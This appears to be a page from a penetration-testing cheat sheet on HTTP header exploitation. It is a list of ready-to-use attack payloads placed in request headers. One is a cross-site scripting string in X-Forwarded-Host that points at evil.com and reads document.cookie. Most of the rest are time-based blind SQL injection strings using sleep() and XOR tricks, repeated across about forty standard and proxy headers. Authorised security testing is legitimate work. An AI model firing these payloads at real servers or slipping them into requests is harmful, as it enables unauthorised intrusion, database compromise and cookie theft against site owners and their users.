HTTP Header Exploitation

X-Forwarded-Host: evil.com"><img src/onerror=prompt(document.cookie)>

X-Forwarded-Host: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z

X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z

Referer: https://site.com/'+(select*from(select(sleep(10)))a)+'

Cookie: 'XOR(if(now()=sysdate(),sleep(10),0))XOR'

User-Agent: "XOR(if(now()=sysdate(),sleep(10),0))XOR"

SQLi

Accept: "' or sleep(30)='"
Accept-Charset: "' or sleep(30)='"
Accept-Datetime: "' or sleep(30)='"
Accept-Encoding: "' or sleep(30)='"
Accept-Language: "' or sleep(30)='"
Authorization: "' or sleep(30)='"
Cache-Control: "' or sleep(30)='"
Connection: "' or sleep(30)='"
Content-Length: "' or sleep(30)='"
Content-MD5: "' or sleep(30)='"
Content-Type: "' or sleep(30)='"
Cookie: "' or sleep(30)='"
Date: "' or sleep(30)='"
Expect: "' or sleep(30)='"
Forwarded: "' or sleep(30)='"
From: "' or sleep(30)='"
If-Match: "' or sleep(30)='"
If-Modified-Since: "' or sleep(30)='"
If-None-Match: "' or sleep(30)='"
If-Range: "' or sleep(30)='"
If-Unmodified-Since: "' or sleep(30)='"
Max-Forwards: "' or sleep(30)='"
Origin: "' or sleep(30)='"
Pragma: "' or sleep(30)='"
Proxy-Authorization: "' or sleep(30)='"
Range: "' or sleep(30)='"
Referer: "' or sleep(30)='"
TE: "' or sleep(30)='"
Upgrade: "' or sleep(30)='"
User-Agent: "' or sleep(30)='"
Via: "' or sleep(30)='"
Warning: "' or sleep(30)='"
X-Client-IP: "' or sleep(30)='"
X-Remote-IP: "' or sleep(30)='"
X-Remote-Addr: "' or sleep(30)='"
X-Forwarded-For: "' or sleep(30)='"
X-Originating-IP: "' or sleep(30)='"
X-Host: "' or sleep(30)='"
X-Forwarde-Host: "' or sleep(30)='"

Time Based SQLi

PreviousHTTP Verb Tampering NextHTTP Request Smuggling

Last updated 1 day ago